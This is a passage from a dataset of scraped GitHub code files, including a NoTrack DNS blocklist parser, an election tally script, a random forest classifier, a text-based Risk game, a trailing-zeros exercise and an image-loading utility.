''\n        outputfile = ''\n\n        #Prepare for writing downloaded file to temp folder\n        if url.endswith('zip'):                                #Check file extension\n            extension = 'zip'\n            outputfile = f'{folders.tempdir}/{listname}.zip'\n\n        else:                                                  #Other - Assume txt for output\n            extension = 'txt'\n            outputfile = destination\n\n        if not download_file(url, outputfile):\n            return False\n\n        if extension == 'zip':                                 #Extract zip file?\n            self.__extract_list(outputfile, destination)\n\n        return True\n\n\n    def __action_lists(self):\n        \"\"\"\n        Go through config and process each enabled list\n        1. Skip disabled lists\n        2. Check if list is downloaded or locally stored\n        3. For downloaded lists\n        3a. Check file age\n        3b. Download new copy if out of date\n        4. Read file into filelines list\n        5. Process list based on type\n        \"\"\"\n        blname = ''                     #Block list name (shortened)\n        blenabled = False\n        blurl = ''                      #Block list URL\n        bltype = ''                     #Block list type\n        blfilename = ''                 #Block list file name\n        linecount = 0\n\n        for bl in blocklistconf.items():\n            blname = bl[0]\n            blenabled = bl[1][0]\n            blurl = bl[1][1]\n            bltype = bl[1][2]\n\n            if not blenabled:           #Skip disabled blocklist\n                continue\n\n            print(f'Processing {blname}')\n\n            #Is this a downloadable file or locally stored?\n            if blurl.startswith('http') or blurl.startswith('ftp'):\n                blfilename = f'{folders.tempdir}/{blname}.txt' #Download to temp folder\n                if self.__check_file_age(blfilename):          #Does file need freshening?\n                    self.__download_list(blurl, blname, blfilename)\n\n            else:                                              #Local file\n                blfilename = blurl                             #URL is actually the filename\n\n            filelines = load_file(blfilename)                  #Read temp file\n\n            if not filelines:                                  #Anything read from file?\n                logger.warning(f'Data missing, unable to process {blname}')\n                continue\n\n            linecount = len(filelines)  #Safe to count now that filelines is known to hold data\n\n            if bltype == TYPE_PLAIN:\n                self.__process_plainlist(filelines, linecount, blname)\n            elif bltype == TYPE_EASYLIST:\n                self.__process_easylist(filelines, linecount, blname)\n            elif bltype == TYPE_UNIXLIST:\n                self.__process_unixlist(filelines, linecount, blname)\n            elif bltype == TYPE_CSV:\n                self.__process_csv(filelines, linecount, blname)\n\n            print(f'Finished processing {blname}')\n\n\n    def __action_customlists(self):\n        \"\"\"\n        Go through config and process each enabled list\n        1. Skip disabled lists\n        2. Check if list is downloaded or locally stored\n        3. For downloaded lists\n        3a. Check file age\n        3b. Download new copy if out of date\n        4. Read file into filelines list\n        5. 
Process list based on type\n        \"\"\"\n        blname = ''\n        blurl = ''                      #Block list URL\n        blfilename = ''                 #Block list file name\n        i = 0                           #Loop position (for naming)\n        customurllist = list()\n\n        print('Processing Custom Blocklists')\n        if self.bl_custom == '':\n            logger.debug('No custom blocklists files or URLs set')\n            return\n\n        customurllist = self.bl_custom.split(',')         #Explode comma separated vals\n\n        for blurl in customurllist:\n            i += 1\n            blname = f'bl_custom{i}'                      #Make up a name\n            logger.info(f'{blname} - {blurl}')\n\n            #Is this a downloadable file or locally stored?\n            if blurl.startswith('http') or blurl.startswith('ftp'):\n                #Download to temp folder with loop position in file name\n                blfilename = f'{folders.tempdir}/{blname}.txt'\n                if self.__check_file_age(blfilename):     #Does file need freshening?\n                    self.__download_list(blurl, blname, blfilename)\n\n            else:                                         #Local file\n                blfilename = blurl\n\n            filelines = load_file(blfilename)             #Read temp file\n            if not filelines:                             #Anything read from file?\n                logger.warning(f'File missing, unable to process {blname}')\n                continue\n\n            self.__process_customlist(filelines, len(filelines), blname)  #Pass the required linecount argument\n            logger.info(f'Finished processing {blname}')\n\n\n    def __dedup_lists(self):\n        \"\"\"\n        Final sort and then save list to file\n        1. Sort the blocklist by the reversed domain (blocklist[x][0])\n        2. Check if each item matches the beginning of the previous item\n        (i.e. a subdomain of a blocked domain)\n        3. Remove matched items from the list\n        4. Add unique items into sqldata and blacklist\n        5. Save blacklist to file\n        6. Insert SQL data\n        \"\"\"\n        prev = '\\0'                #Previous has to be something (e.g. a null byte)\n        dns_blacklist = list()\n        sqldata = list()\n\n        self.__dedupcount = 0\n        print('Sorting and Deduplicating blocklist')\n\n        self.__blocklist.sort(key=lambda x: x[0])  #Sort list on col0 \"reversed\"\n        for item in self.__blocklist:\n            if item[0].startswith(prev):\n                #print('Removing:', item)\n                #self.__blocklist.remove(item)\n                self.__dedupcount += 1\n            else:\n                #self.__blocklist.append(tuple([reverse, subdomain, comment, source]))\n                dns_blacklist.append(self.__add_blacklist(item[1]))\n                sqldata.append(tuple([item[3], item[1], True, item[2]]))\n                prev = item[0]\n\n        print(f'Further deduplicated {self.__dedupcount} domains')\n        print(f'Final number of domains in blocklist: {len(dns_blacklist)}')\n\n        save_file(dns_blacklist, f'{folders.dnslists}notrack.list')\n        self.__dbwrapper.blocklist_insertdata(sqldata)\n\n\n    def create_blocklist(self):\n        \"\"\"\n        Create blocklist and restart DNS Server\n        \"\"\"\n        self.__dbwrapper.blocklist_createtable()  #Create SQL Tables\n        self.__dbwrapper.blockliststats_createtable()\n        self.__dbwrapper.blocklist_cleartable()   #Clear SQL Tables\n\n        self.__process_whitelist()    #Need whitelist first\n        self.__action_lists()         #Action default lists\n        self.__action_customlists()   #Action users custom lists\n        self.__tld_whitelist()\n\n        print('Finished processing all block lists')\n        print(f'Total number of domains added: {len(self.__blocklist)}')\n        print(f'Total number of domains deduplicated: {self.__totaldedupcount}')\n\n        self.__dedup_lists()  #Dedup then insert domains\n        self.__services.restart_dnsserver()\n\n\n    def disable_blocking(self):\n        \"\"\"\n        Move blocklist to temp folder\n        \"\"\"\n        if move_file(folders.main_blocklist, folders.temp_blocklist):\n            logger.info('Moving blocklist to temp folder')\n        else:\n            logger.warning('Blocklist missing')\n\n        self.__services.restart_dnsserver()\n\n\n    def enable_blockling(self):\n        \"\"\"\n        Move temp blocklist back to DNS config folder\n        \"\"\"\n        if 
move_file(folders.temp_blocklist, folders.main_blocklist):\n logger.info('Moving temp blocklist back')\n self.__services.restart_dnsserver()\n\n else:\n logger.warning('Temp blocklist missing, I will recreate it')\n self.create_blocklist()\n\n\n def load_blconfig(self):\n \"\"\"\n \"\"\"\n blconfig = '' #Blocklist Config File\n filelines = list()\n\n blconfig = f'{folders.webconfigdir}/bl.php'\n\n if not os.path.isfile(blconfig):\n logger.warning('Blocklist config is missing, using default values')\n return\n\n filelines = load_file(blconfig)\n\n for line in filelines:\n matches = Regex_BlockListStatus.match(line)\n if matches is not None:\n self.set_blocklist_status(matches[1], matches[2])\n continue\n\n matches = Regex_BlockListCustom.match(line)\n if matches is not None:\n self.bl_custom = matches[1]\n continue\n\n\n def set_blocklist_status(self, blname, status):\n \"\"\"\n Set Blocklist status from config\n \"\"\"\n newstatus = False\n\n if status == 'true':\n newstatus = True\n\n if blname in blocklistconf:\n blocklistconf[blname][0] = newstatus;\n return True;\n\n return False;\n\n\ndef main():\n print('NoTrack Block List Parser')\n config = NoTrackConfig()\n check_root()\n\n blockparser = BlockParser(config.dns_blockip)\n blockparser.load_blconfig()\n blockparser.create_blocklist()\n print('Finished creating block list for NoTrack :-)')\n print()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sq4/notrack","sub_path":"src/blockparser.py","file_name":"blockparser.py","file_ext":"py","file_size_in_byte":28401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"9472521088","text":"import os\nimport csv\n\n\nvotes = []\ncandidate_list = []\ncandidates = []\n\ncsvpath = os.path.join('', \"election_data.csv\")\n\nwith open(csvpath) as csvfile:\n reader=csv.reader(csvfile)\n\n for row in reader:\n votes.append(row[0])\n candidates.append(row[2])\n\n #remove header in votes list\n votes.pop(0)\n vote_count = len(votes)\n\n print(\"ELECTION RESULTS\")\n print(\" \")\n print(\"A Total of \" + str(vote_count) + \" votes were cast.\")\n print(\" \") \n\n #remove header from Candidates list\n candidates.pop(0)\n\n #find unique values in \"candidates\" list\n candidate_set = set(candidates)\n candidate_list = list(candidate_set)\n\n print(\"The list of possible candidates are:\" + str(candidate_list))\n print(\"-------------------------------\")\n\n #for name in candidate_list:\n # print(name)\n\n #create empty lists for each candidate\n khan = []\n otooley = []\n li = []\n correy = []\n #add each candidate to their own list each time they appear\n for each in candidates:\n if each == \"Khan\":\n khan.append(each)\n elif each == \"O'Tooley\":\n otooley.append(each)\n elif each == \"Li\":\n li.append(each)\n elif each == \"Correy\":\n correy.append(each)\n\n #find percentage of votes each candidate received\n correy_percent = len(correy)/vote_count\n otooley_percent = len(otooley)/vote_count\n li_percent = len(li)/vote_count\n khan_percent = len(khan)/vote_count\n \n\n print(\"Correy: \" + str(len(correy)) + \" {:.2%}\".format(correy_percent))\n print(\"O'Tooley: \" + str(len(otooley)) + \" {:.2%}\".format(otooley_percent))\n print(\"Li: \" + str(len(li)) + \" {:.2%}\".format(li_percent))\n print(\"Khan: \" + str(len(khan)) + \" {:.2%}\".format(khan_percent))\n\n print(\"WINNER: Khan\")\n\nwith open('analysis/election_analysis.txt', 'w') as f:\n f.write(\"ELECTION RESULTS\" \"\\n\")\n f.write(\" \" \"\\n\")\n f.write(\"A Total of \" + 
str(vote_count) + \" votes were cast.\" \"\\n\")\n f.write(\" \" \"\\n\")\n f.write(\"The list of possible candidates are:\" + str(candidate_list) )\n f.write( \"\\n\" \"-------------------------------\" \"\\n\")\n f.write(\"Correy: \" + str(len(correy)) + \" {:.2%}\".format(correy_percent))\n f.write(\"\\n\" \"O'Tooley: \" + str(len(otooley)) + \" {:.2%}\".format(otooley_percent))\n f.write(\"\\n\" \"Li: \" + str(len(li)) + \" {:.2%}\".format(li_percent))\n f.write(\"\\n\" \"Khan: \" + str(len(khan)) + \" {:.2%}\".format(khan_percent))\n f.write( '\\n' \"WINNER: Khan\")\n ","repo_name":"ChrisJtron/python_challenge_homework","sub_path":"pypoll/mainpypoll3.py","file_name":"mainpypoll3.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70761289069","text":"# implementation of the Random Forest algorithm\n# to keep things more readable, \"fc\" is used to indicate \"first class\", and \"sc\" to indicate \"second class\"\n\n# internal imports\nimport Classifier\nimport DecisionTree\nimport debug\n\n# external imports\nimport math\nimport random\n\n\n# the maximum number of random decision trees to train\n_max_trees = 500\n\n# the maximum number of random features to sample\n_max_sample = 200\n\n# the minimum number of records required to build another Tree node; otherwise force a Leaf node\n_leaf_threshold = 5\n\n# the maximum number of times a tree can recurse into new branches when growing (1000 is Python's default internal max)\n_rec_limit = 100\n\n\n# public interface function to training a classifier; expects 2D list with binary features as input\ndef train(parsed_training_data):\n\n # HELPER FUNCTIONS for train function\n # -----------------------------------\n\n # calculate the information entropy in a set of data with two classes\n def _calculate_entropy(fc_count, sc_count):\n if fc_count == 0 or sc_count == 0:\n entropy = 0\n else:\n fc_prob = fc_count / (fc_count + sc_count)\n sc_prob = 1 - fc_prob\n\n entropy = -fc_prob * math.log2(fc_prob) - sc_prob * math.log2(sc_prob)\n\n return entropy\n\n # function to take a random sample of features from provided training data and find the feature to split on\n # that provides the greatest information gain\n def _find_best_sampled_feature(training_data_cut):\n\n # pick a number of random samples up to square root length of classifier features, but no more than _max_sample\n features_length = len(classifier_features)\n sqrt_features = math.ceil(math.sqrt(features_length))\n sample_feature_size = sqrt_features if sqrt_features < _max_sample else _max_sample\n sample_feature_list = []\n for j in range(0, sample_feature_size):\n feature_index = random.randint(0, (features_length - 1))\n sample_feature_list.append(feature_index)\n\n # for each sampled feature, split the training data on that feature, count the votes of the resulting class\n # distribution, and build a list of the sampled features and their associated vote information\n vote_count_list = []\n for feature_index in sample_feature_list:\n # add 2 to feature index to skip RECORD and CLASS columns\n skip_index = feature_index + 2\n\n # count the resulting first class and second class votes on each side of the split on this feature\n fc_has_vote = 0\n sc_has_vote = 0\n fc_has_not_vote = 0\n sc_has_not_vote = 0\n for find_row in training_data_cut:\n if find_row[skip_index]:\n if find_row[1] == first_class:\n fc_has_vote += 1\n else:\n sc_has_vote += 1\n else:\n if find_row[1] == 
first_class:\n fc_has_not_vote += 1\n else:\n sc_has_not_vote += 1\n\n # add the vote information resulting from the split to the vote count list\n index_and_votes = (feature_index, (fc_has_vote, sc_has_vote), (fc_has_not_vote, sc_has_not_vote))\n vote_count_list.append(index_and_votes)\n\n # calculate the class vote entropy for the total training data cut; this can be found by adding up class votes\n # in the first (or any) index of the vote_count_list\n fc_parent_vote = vote_count_list[0][1][0] + vote_count_list[0][2][0]\n sc_parent_vote = vote_count_list[0][1][1] + vote_count_list[0][2][1]\n parent_entropy = _calculate_entropy(fc_parent_vote, sc_parent_vote)\n\n # initialize variable to contain information of best information gain split that can be found; use first feature\n # in vote count list as starting data; second element is information gain\n best_information_feature = (vote_count_list[0], 0)\n\n # calculate entropy resulting from each feature split in the vote count list to find information gain\n parent_votes = fc_parent_vote + sc_parent_vote\n for feature_vote_count in vote_count_list:\n # gather has (left) and has not (right) votes\n fc_has_vote = feature_vote_count[1][0]\n sc_has_vote = feature_vote_count[1][1]\n fc_has_not_vote = feature_vote_count[2][0]\n sc_has_not_vote = feature_vote_count[2][1]\n\n # calculate entropy of left (has) and right (has not) children\n child_left_entropy = _calculate_entropy(fc_has_vote, sc_has_vote)\n child_right_entropy = _calculate_entropy(fc_has_not_vote, sc_has_not_vote)\n\n # calculate proportion of votes in left and right children\n child_left_prop = (fc_has_vote + sc_has_vote) / parent_votes\n child_right_prop = (fc_has_not_vote + sc_has_not_vote) / parent_votes\n\n # calculate overall child entropy and information gain\n child_entropy = child_left_prop * child_left_entropy + child_right_prop * child_right_entropy\n information_gain = parent_entropy - child_entropy\n\n # compare with current best information gain\n if information_gain > best_information_feature[1]:\n best_information_feature = (feature_vote_count, information_gain)\n\n # prepare return data as feature and votes tuple:\n # ((feature_name, feature_index), (fc_has_vote, sc_has_vote), (fc_has_not_vote, sc_has_not_vote))\n feature_index = best_information_feature[0][0]\n feature_name = classifier_features[feature_index]\n fc_has_vote = best_information_feature[0][1][0]\n sc_has_vote = best_information_feature[0][1][1]\n fc_has_not_vote = best_information_feature[0][2][0]\n sc_has_not_vote = best_information_feature[0][2][1]\n return_data = ((feature_name, feature_index), (fc_has_vote, sc_has_vote), (fc_has_not_vote, sc_has_not_vote))\n\n return return_data\n\n # recursive function for building a random decision tree based on the provided cut of training data\n def _rec_build_random_tree(training_data_cut, rec_count):\n # increase recursion count by 1\n rec_count += 1\n\n # find the feature to split the data that provides greatest information gain from a random sample\n # returns tuple ((feature_name, feature_index), (fc_has_vote, sc_has_vote), (fc_has_not_vote, sc_has_not_vote))\n feature_and_votes = _find_best_sampled_feature(training_data_cut)\n\n # if training data falls below a preset threshold or the vote is unanimous build a Leaf node;\n # otherwise split data on feature and build a Tree node; also enforce a recursion limit\n fc_has_vote = feature_and_votes[1][0]\n sc_has_vote = feature_and_votes[1][1]\n fc_has_not_vote = feature_and_votes[2][0]\n sc_has_not_vote = 
feature_and_votes[2][1]\n\n # length of training data cut\n cut_length = len(training_data_cut)\n\n # build left (has feature) branch\n if cut_length < _leaf_threshold or fc_has_vote == 0 or sc_has_vote == 0 or rec_count > _rec_limit:\n # build Leaf based on votes\n left_branch = DecisionTree.Leaf((fc_has_vote, sc_has_vote))\n else:\n # split out and build Tree\n has_feature_data = []\n for tree_row in training_data_cut:\n # add 2 to feature index to skip RECORD and CLASS columns\n feature_index = feature_and_votes[0][1] + 2\n if tree_row[feature_index]:\n has_feature_data.append(tree_row)\n\n # recurse into the left branch building the tree of data that has feature\n left_branch = _rec_build_random_tree(has_feature_data, rec_count)\n\n # build right (has not feature) branch\n if cut_length < _leaf_threshold or fc_has_not_vote == 0 or sc_has_not_vote == 0 or rec_count > _rec_limit:\n # build Leaf based on votes\n right_branch = DecisionTree.Leaf((fc_has_not_vote, sc_has_not_vote))\n else:\n # split out and build Tree\n has_not_feature_data = []\n for tree_row in training_data_cut:\n # add 2 to feature index to skip RECORD and CLASS columns\n feature_index = feature_and_votes[0][1] + 2\n if not tree_row[feature_index]:\n has_not_feature_data.append(tree_row)\n\n # recurse into the right branch building the tree of data without feature\n right_branch = _rec_build_random_tree(has_not_feature_data, rec_count)\n\n # build tree with splitting feature name and index, and the left and right branches\n feature_name_index = feature_and_votes[0]\n random_tree = DecisionTree.Tree(feature_name_index, left_branch, right_branch)\n\n return random_tree\n\n # ----------------------------------\n # MAIN CODE for train function\n # ----------------------------------\n\n first_class = parsed_training_data[1][1]\n second_class = \"\"\n\n # build list of classifier's feature names\n classifier_features = []\n for feature in parsed_training_data[0][2:]:\n classifier_features.append(feature)\n\n # find second class; also count the occurrence of each class and add to the class counts dictionary\n class_counts = {}\n for row in parsed_training_data[1:]:\n class_name = row[1]\n if class_name in class_counts:\n class_counts[class_name] += 1\n else:\n second_class = class_name\n class_counts[class_name] = 1\n\n # build n random decision trees, where n is the length of the data, up to the max\n classifier_details = []\n training_data_length = len(parsed_training_data[1:])\n tree_count = training_data_length if training_data_length < _max_trees else _max_trees\n for i in range(0, tree_count):\n\n # debug counter\n debug.run_counter(\"rf.train\", 10)\n\n # bootstrap training data, taking random sample of rows (with replacement) equal to the length of training data\n bootstrap_data = []\n for k in range(0, training_data_length):\n row_index = random.randint(0, (training_data_length - 1)) + 1\n bootstrap_data.append(parsed_training_data[row_index])\n\n # build a random decision tree by passing bootstrapped data (without headers) and list of classifier features\n # to recursive build function\n random_decision_tree = _rec_build_random_tree(bootstrap_data, 0)\n\n # add tree to classifier details\n classifier_details.append(random_decision_tree)\n\n # create new instance of Classifier and populate with classifier details\n class_names_counts = ((first_class, class_counts[first_class]), (second_class, class_counts[second_class]))\n classifier = Classifier.Classifier(\"rf\", class_names_counts, classifier_features)\n for detail 
in classifier_details:\n classifier.add_classifier_detail(detail)\n\n # reset the debug counter\n debug.reset_counter(\"rf.train\")\n\n return classifier\n\n\n# public interface function to classify data; expects 2D list with binary features as input and a classifier object\ndef classify(parsed_test_data, classifier):\n\n # HELPER FUNCTION for classify function\n # -----------------------------------\n\n # recursively run through the given decision tree until reaching a terminal Leaf node; current_row is expected\n # without RECORD column (meaning that its feature index matches the classifier's feature list)\n def _rec_run_decision_tree(tree, current_row):\n\n # check node type of tree; if Tree recurse further, if Leaf return votes\n if tree.get_node_type() == \"tree\":\n # get the index of the Tree node's splitting feature\n feature_and_index = tree.get_feature_and_index()\n index = feature_and_index[1]\n\n # if the row has the feature, recurse left (has branch), otherwise recurse right (has not branch)\n if current_row[index]:\n left_branch = tree.get_left()\n return _rec_run_decision_tree(left_branch, current_row)\n else:\n right_branch = tree.get_right()\n return _rec_run_decision_tree(right_branch, current_row)\n else:\n leaf_votes = tree.get_votes()\n return leaf_votes\n\n # ----------------------------------\n # MAIN CODE for train function\n # ----------------------------------\n\n # get class names and counts from classifier\n fc_name = classifier.get_class_names_counts()[0][0]\n fc_count = classifier.get_class_names_counts()[0][1]\n sc_name = classifier.get_class_names_counts()[1][0]\n sc_count = classifier.get_class_names_counts()[1][1]\n\n # build results by running each row through the classifier's decision trees\n results = []\n classifier_details = classifier.get_classifier_details()\n for row in parsed_test_data[1:]:\n\n # debug counter\n debug.run_counter(\"rf.classify\", 10)\n\n # variables to hold the total first and second class votes across all decision trees\n fc_total_votes = 0\n sc_total_votes = 0\n\n # run the row through each decision tree in the classifier\n for detail in classifier_details:\n\n # get tuple of first and second class votes from detail decision tree\n fc_and_sc_votes = _rec_run_decision_tree(detail, row[1:])\n\n # pull out class votes and add votes to total tallies\n fc_vote = fc_and_sc_votes[0]\n sc_vote = fc_and_sc_votes[1]\n fc_total_votes += fc_vote\n sc_total_votes += sc_vote\n\n # calculate more probable class (the one that received more total votes)\n # if votes are equal, assign the overall most probable class\n record = row[0]\n if fc_total_votes > sc_total_votes:\n results.append((record, fc_name))\n elif sc_total_votes > fc_total_votes:\n results.append((record, sc_name))\n else:\n if fc_count > sc_count:\n results.append((record, fc_name))\n else:\n results.append((record, sc_name))\n\n # reset the debug counter\n debug.reset_counter(\"rf.classify\")\n\n return results","repo_name":"glanton/robocritic","sub_path":"rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":14399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22635874751","text":"import os\nimport random\n\nNR_OF_PLAYERS = 3\nADDED_ARMIES_PER_TURN = 10\n\nclass Manager():\n '''\n Manages the game. 
Takes turns and communicates with the active player\n '''\n def __init__(self, nrOfPlayers):\n self.nrOfPlayers = nrOfPlayers\n self.players = self.init_players(nrOfPlayers)\n self.activePlayer = self.players[0]\n\n def run(self):\n os.system('cls' if os.name == 'nt' else 'clear')\n print(\n\"\\n-----------------------------------\\n\\\n Active player: {}\\\n\\n-----------------------------------\\n\\\n \".format(self.activePlayer.id))\n \n self.activePlayer.run()\n self.next_player()\n\n def next_player(self):\n playerNr = self.activePlayer.id\n if self.activePlayer.id >= len(self.players) - 1:\n self.activePlayer = self.players[0]\n else:\n self.activePlayer = self.players[playerNr + 1]\n\n @classmethod\n def init_players(self, NrOfPlayers):\n Players = []\n for idx in range(NrOfPlayers):\n Players.append(Player(idx))\n return Players\n\nclass Player():\n '''\n Keeps track of a player's info, and what it should do in a turn\n '''\n def __init__(self, id):\n self.id = id\n\n def run(self):\n Finished = False\n self.ask_info()\n while not Finished:\n option = self.ask_option()\n if option == 1:\n self.ask_reinforce()\n Finished = True\n elif option == 2: \n frm, to, confirmedAttack = self.ask_attack_fromto()\n if confirmedAttack:\n Finished = self.battle(frm, to)\n self.ask_info()\n input(\"----- End of turn. Press a key to continue. -----\")\n\n def ask_option(self):\n optionValid = False\n while not optionValid:\n try:\n userInput = int(input(\\\n\"Choose an option:\\\n\\n 1) Reinforce armies\\\n\\n 2) Attack\\\n\\n\\t - \"))\\\n\n optionValid = True\n except Exception:\n print(\"no valid number given!\")\n pass\n return userInput\n \n def battle(self, frm, to):\n validAttackAmount = False\n availableArmies = Region.get_vertex_armies(frm) - 1\n while not validAttackAmount:\n amountAttack = int(input(\"How many armies to attack {}\\n\\t\".format(to)))\n if amountAttack > availableArmies or amountAttack <= 0:\n print(\"Invalid amount of armies to attack with. \")\n else:\n validAttackAmount = True\n if validAttackAmount:\n win = bool(random.randint(0,1))\n if win: #todo\n Region.set_vertex_armies(to, amountAttack)\n Region.set_vertex_owner(to, self.id)\n print(\"Player {} has won {}, {} armies placed. \".format(self.id, to, amountAttack))\n else:\n print(\"lost battle... \")\n Finished = False\n print(\"battling\")\n Finished = True\n return Finished\n\n def ask_info(self): \n print(\"\\n\") \n for city in self.owned_cities():\n cityObj = Region.get_vertex(city)\n print(\"[Info] {} ==> {} armies\".format(cityObj.name, cityObj.armies))\n print(\"\\n\")\n\n def ask_city_to_reinforce(self):\n validCity = False\n while not validCity:\n try:\n inputCity = input(\"[Q] Which city to reinforce? Choose from: {}\\n\\t\".format(self.owned_cities()))\n if inputCity in self.owned_cities():\n validCity = True\n else:\n print(\"[Error] Given city not owned by player\")\n\n except Exception:\n print(\"[Error] No valid city given\")\n pass\n return inputCity\n \n def ask_how_many_reinforcements(self, city, armiesLeftToAdd):\n validArmies = False\n while not validArmies:\n try:\n armiesToAdd = int(input(\"[Q] How many armies to add to {}?\\n\\t\".format(city)))\n if armiesToAdd == 0:\n print(\"Cancelled reinforcing\")\n break\n elif armiesToAdd <= armiesLeftToAdd and armiesToAdd >= 0:\n cityObj = Region.get_vertex(city)\n cityObj.add_armies(armiesToAdd)\n print(\"[Info] Successful. 
Armies now in {}: \".format(city), cityObj.armies)\n validArmies = True\n else:\n print(\"[Error] Invalid number of armies given. \")\n except Exception:\n print(\"[Error] Invalid input\")\n return armiesToAdd\n\n def ask_reinforce(self):\n armies_left_to_add = ADDED_ARMIES_PER_TURN\n while armies_left_to_add != 0:\n print(\"[Info] Reinforcements left: {}\".format(armies_left_to_add))\n city = self.ask_city_to_reinforce()\n armies_left_to_add -= self.ask_how_many_reinforcements(city, armies_left_to_add)\n \n return 0 #\n\n def ask_attack_fromto(self):\n print(\"Owned cities: \", self.owned_cities()) \n validFrom = False\n validTo = False\n confirmAttack = False\n frm = ''\n to = ''\n try:\n while not validFrom:\n frm = input(\"From which city do you want to attack: \\n\\t--> \")\n if frm == '':\n break\n elif Region.get_vertex_owner(frm) != self.id:\n print(\"[Invalid] Attempting to attack from city that is not owned by you!\") \n elif Region.get_vertex_armies(frm) <= 1:\n print(\"[Invalid] Not enough armies available to attack with. \")\n else:\n validFrom = True\n while (not validTo) and validFrom:\n print(\"Attackable cities from {}: \".format(frm), self.get_attackable_from(frm))\n to = input(\"Which city do you want to attack: \\n\\t--> \")\n if to == '':\n break \n elif Region.get_vertex_owner(to) == self.id:\n print(\"[Invalid] Attempting to attack city that is owned by you!\")\n elif to not in Region.get_vertex_list(frm):\n print(\"[Invalid] Attempting to attack city that is not adjacent\")\n else:\n validTo = True\n print(\"Player {} attacks {} from {}\".format(self.id, to, frm))\n confirmAttack = True\n\n except Exception:\n print(\"no valid city given!\")\n pass\n return frm, to, confirmAttack\n\n def get_attackable_from(self, frm):\n attackable = []\n for city in Region.get_vertex_list(frm):\n if Region.get_vertex_owner(city) != self.id:\n attackable.append(city)\n return attackable\n\n def check_attack_combi(self, frm, to):\n if to not in Region.get_vertex_list(frm):\n print(\"Attempting to attack city that is not adjacent\")\n return False\n else:\n return True\n\n def owned_cities(self):\n return Region.get_players_vertices(self.id)\n\nclass Vertex:\n def __init__(self, name, ownedBy, armies):\n self.name = name\n self.ownedBy = ownedBy\n self.adjacent = {}\n self.armies = armies\n def __str__(self):\n return str(self.name) + ' adjacent: ' + str([x.name for x in self.adjacent])\n\n def add_neighbor(self, neighbor):\n self.adjacent[neighbor] = True\n\n def get_connections(self):\n return self.adjacent.keys() \n\n def get_name(self):\n return self.name\n\n def get_weight(self, neighbor):\n return self.adjacent[neighbor]\n \n def add_armies(self, armiesToAdd):\n self.armies += armiesToAdd\n\n\nclass Graph:\n def __init__(self):\n self.vert_dict = {}\n self.num_vertices = 0\n\n def __iter__(self):\n return iter(self.vert_dict.values())\n\n def add_vertex(self, node, ownedBy, armies):\n self.num_vertices = self.num_vertices + 1\n new_vertex = Vertex(node, ownedBy, armies)\n self.vert_dict[node] = new_vertex\n return new_vertex\n\n def get_vertex(self, name):\n if name in self.vert_dict:\n return self.vert_dict[name]\n else:\n return None\n \n def get_vertex_list(self, name):\n if name in self.vert_dict:\n return [x.name for x in self.vert_dict[name].adjacent]\n\n def get_vertex_owner(self, name):\n if name in self.vert_dict:\n return self.vert_dict[name].ownedBy \n else:\n return None\n\n def get_vertex_armies(self, name):\n if name in self.vert_dict:\n return 
self.vert_dict[name].armies\n else:\n return None\n\n def set_vertex_armies(self, name, value):\n if name in self.vert_dict:\n self.vert_dict[name].armies = value\n \n def set_vertex_owner(self, name, player):\n if name in self.vert_dict:\n self.vert_dict[name].ownedBy = player\n\n def get_players_vertices(self, player):\n playersVertices = []\n for name in self.vert_dict:\n vertex = self.vert_dict[name]\n if vertex.ownedBy == player:\n playersVertices.append(name)\n return playersVertices\n\n def add_edge(self, frm, to):\n self.vert_dict[frm].add_neighbor(self.vert_dict[to])\n self.vert_dict[to].add_neighbor(self.vert_dict[frm])\n\n def get_vertices(self):\n return self.vert_dict.keys()\n\nRegion = Graph()\n\nRegion.add_vertex('Groningen', 0, 5)\nRegion.add_vertex('Delfzijl', 0, 5)\nRegion.add_vertex('Leeuwarden', 1, 10)\nRegion.add_vertex('Assen', 2, 10)\n\nRegion.add_edge('Groningen', 'Delfzijl')\nRegion.add_edge('Groningen', 'Leeuwarden')\nRegion.add_edge('Groningen', 'Assen')\n\nmanager = Manager(NR_OF_PLAYERS)\nwhile True:\n manager.run()\n","repo_name":"jeffreyhingstman/Risk","sub_path":"Risk.py","file_name":"Risk.py","file_ext":"py","file_size_in_byte":10100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35058649835","text":"class Solution:\n # @param A : integer\n # @return an integer\n def trailingZeroes(self, A):\n count = 0\n for i in range(1, A):\n z = self.power(5, i)\n if A // z != 0:\n count += A // z\n else:\n break # higher powers of 5 no longer divide A\n return count\n\n def power(self, x, y):\n if y == 0:\n return 1\n z = 0 if y == -1 else y // 2\n temp = self.power(x, z)\n if y % 2 == 0:\n return temp * temp\n else:\n if y > 0:\n return x * temp * temp\n else:\n return (temp * temp) / x\n\n\n\nsol = Solution()\nprint(sol.trailingZeroes(2))","repo_name":"koushikruidas/interviewbit","sub_path":"math/trailling_zeros_in_factorial.py","file_name":"trailling_zeros_in_factorial.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18101917507","text":"import os\nimport urllib.request as request_file\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\nfrom urllib.parse import urlparse\nfrom zipfile import ZipFile\n\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom PIL import Image\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\n# domain mapped session for reuse\n_requests_sessions = {}\n\n\ndef _get_retry_session(url):\n domain = urlparse(url.lower()).netloc\n if domain in _requests_sessions:\n return _requests_sessions[domain]\n\n session = requests.Session()\n retries = Retry(\n total=5, backoff_factor=1, status_forcelist=[500, 502, 503, 504]\n )\n session.mount(\"http://\", HTTPAdapter(max_retries=retries))\n session.mount(\"https://\", HTTPAdapter(max_retries=retries))\n _requests_sessions[domain] = session\n\n return session\n\n\ndef get_image_from_path(image_path, image_mode):\n \"\"\"Get image from path.\n\n :param image_path: The path to the image.\n :type image_path: str\n :param image_mode: The mode to open the image in.\n See pillow documentation for all modes:\n https://pillow.readthedocs.io/en/stable/handbook/concepts.html\n :type image_mode: str\n :return: The image as a numpy array.\n :rtype: numpy.ndarray\n 